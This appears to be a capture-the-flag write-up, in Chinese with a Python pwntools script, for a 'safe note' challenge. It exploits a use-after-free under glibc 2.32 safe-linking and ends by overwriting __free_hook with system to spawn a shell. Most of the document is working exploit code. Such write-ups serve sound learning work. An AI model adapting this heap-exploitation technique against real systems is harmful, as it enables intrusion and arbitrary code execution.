safe note
漏洞分析
free之后未清零造成UAF漏洞
利用思路
libc版本是2.32,tcache的fd经过safe-linking异或加密(不是与运算),加密方式为 (存放fd的地址>>12) ^ 目标地址;只要被改写的chunk和泄露的chunk在同一个4K页内,就可以直接用堆地址>>12代替
1.创建并释放一个堆获取堆地址
2.填充tcache(7个),第8个chunk进入unsorted bin,利用其fd泄露libc,计算出free_hook和system(show之前要先edit一次)
3.利用UAF漏洞实现任意地址写,把free_hook改成system,改fd的时候要使用2.32的加密方式进行加密
4.创建一个内容为/bin/sh的堆并将其释放
exp
import os

from pwn import *
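context(arch='amd64', os='linux', log_level='debug')
file_name = './vuln'


# Coloured stdout helpers used to print the leaked addresses below.
def li(x):
    print('\x1b[01;38;5;214m' + x + '\x1b[0m')


def ll(x):
    print('\x1b[01;38;5;1m' + x + '\x1b[0m')


context.terminal = ['tmux','splitw','-h']
# debug=1 targets a remote service, 0 runs ./vuln locally (naming kept from the original).
debug = 0
if debug:
    # The original called remote() with no arguments, which raises TypeError;
    # take the target from the environment so the remote path actually works.
    r = remote(os.environ['HOST'], int(os.environ['PORT']))
else:
    r = process(file_name)
elf = ELF(file_name)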
def dbg():
    """Attach gdb to the running target `r` (split opened per context.terminal)."""
    target = r
    gdb.attach(target)
def add(index, size):
    """Menu option 1 (create): request a chunk of `size` bytes and bind it to slot `index`."""
    answers = (
        (b'>', b'1'),
        (b'Index: ', str(index).encode()),
        (b'Size: ', str(size).encode()),
    )
    for prompt, value in answers:
        r.sendlineafter(prompt, value)
def delete(index):
    """Menu option 2 (free): release the chunk at slot `index`.

    Per the notes above the slot pointer is not cleared afterwards, which is the UAF
    the rest of the script relies on.
    """
    choice, slot = b'2', str(index).encode()
    r.sendlineafter(b'>', choice)
    r.sendlineafter(b'Index: ', slot)
def edit(index, content):
    """Menu option 3 (edit): write `content` (str or bytes; sendline appends '\\n') into slot `index`."""
    steps = ((b'>', b'3'), (b'Index: ', str(index).encode()), (b'Content: ', content))
    for prompt, value in steps:
        r.sendlineafter(prompt, value)
def show(index):
    """Menu option 4 (show): make the program print slot `index`; the caller reads the output from `r`."""
    menu_choice = b'4'
    r.sendlineafter(b'>', menu_choice)
    r.sendlineafter(b'Index: ', str(index).encode())
# --- Stage 1: heap leak -------------------------------------------------------
# Free one chunk into an empty tcache bin and read it back through the UAF. With
# safe-linking (glibc 2.32) an entry whose next pointer is NULL stores
# (addr >> 12) ^ 0, i.e. the page number of the chunk itself.
add(0, 0x90)
delete(0)
show(0)
# Assumes the page number fits in 5 non-zero bytes (typical 0x55../0x56.. PIE heap).
# NOTE(review): recv(5) may return fewer than 5 bytes; recvn(5) would be stricter.
# The << 12 restores the page-aligned address used for the XOR in stage 3.
heap = u64(r.recv(5)[-5:].ljust(8, b'\x00')) << 12
li('heap = ' + hex(heap))
# --- Stage 2: libc leak -------------------------------------------------------
# Eight 0x80 requests: the first seven frees fill the tcache bin, the eighth lands
# in the unsorted bin with fd pointing into main_arena. Slots 9/10 are the small
# chunks poisoned in stage 3 and also sit between chunk 8 and top, so freeing 8
# does not consolidate it into the top chunk.
for i in range(8):
    add(i + 1 , 0x80)
add(9, 0x20)
add(10, 0x20)
for i in range(8):
    delete(i + 1)
# The notes say show only works after an edit; an empty edit still sends '\n'.
edit(8, '')
show(8)
# Unsorted-bin fd normally equals main_arena+96 on 2.32 and __malloc_hook sits at
# main_arena-0x10; the 106 here was presumably measured after the empty edit
# above perturbed the leaked value — re-derive it in gdb if the libc build changes.
malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 106 - 0x10
li('malloc_hook = ' + hex(malloc_hook))
# Symbol offsets come from the bundled Ubuntu 2.32 build; point this at the target's libc.
libc = ELF('./2.32-0ubuntu3.2_amd64/libc-2.32.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
li('free_hook = ' + hex(free_hook))
system = libc_base + libc.sym['system']
li('system = ' + hex(system))
li('heap = ' + hex(heap))
# --- Stage 3: tcache poisoning under safe-linking -----------------------------
# Free both 0x20 chunks so the bin holds [10 -> 9] (count 2), then overwrite chunk
# 10's fd via the UAF. glibc 2.32 stores fd as (&fd >> 12) ^ target; heap >> 12
# stands in for &fd >> 12, which only holds while chunk 10 lies in the same 4 KiB
# page as the chunk leaked in stage 1.
delete(9)
delete(10)
edit(10, p64((heap>>12) ^ free_hook))
# LIFO: the first malloc returns chunk 10, the second returns __free_hook itself.
add(11, 0x20)
edit(11, b'/bin/sh\x00')
add(12, 0x20)
edit(12, p64(system))
# free(chunk 11) -> __free_hook("/bin/sh") -> system("/bin/sh").
delete(11)
r.interactive()